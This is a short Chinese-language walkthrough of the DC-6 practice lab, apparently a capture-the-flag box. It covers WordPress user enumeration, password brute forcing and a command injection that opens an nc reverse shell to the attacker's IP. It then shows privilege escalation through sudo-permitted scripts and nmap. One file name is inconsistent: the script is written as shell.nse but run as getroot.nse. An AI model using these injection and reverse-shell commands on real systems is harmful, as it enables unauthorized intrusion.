DC 6
DC-6
nmap 扫描一下
vim /etc/hosts
加上 192.168.149.164 wordy
访问 80 端口,是一个 wordpress
wpscan 扫描一下,发现几个用户名
wpscan --url http://wordy -ru
根据作者善意提醒,制作一份密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
把扫描出来的用户名也保存出来,爆破一下
wpscan --url http://wordy -U users.txt -P passwords.txt
后台的一个工具里面有个功能,有命令执行漏洞
burp 抓一下包,看一下
nc 来拿一个 shell 把,kali 里面 nc -lp 6666
访问的时候加上
; nc 192.168.149.141 6666 -e /bin/sh
python -c "import pty;pty.spawn('/bin/bash')" 开启一个交互 shell
在 mark 的目录下找到了一个用户名和密码 graham : GSo7isUM1D4
这个账户可以直接 ssh 登进来 ssh graham@192.168.149.164
登陆以后,sudo -l 发现一个不需要密码就可以用的
在后面追加一个 /bin/bash,这样运行的时候就能拿到 jens 的 shell 了
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
这次是 nmap,可以写个脚本,让 nmap 来执行然后拿到 shell
echo 'os.execute("/bin/sh")' > shell.nse
sudo nmap --script getroot.nse
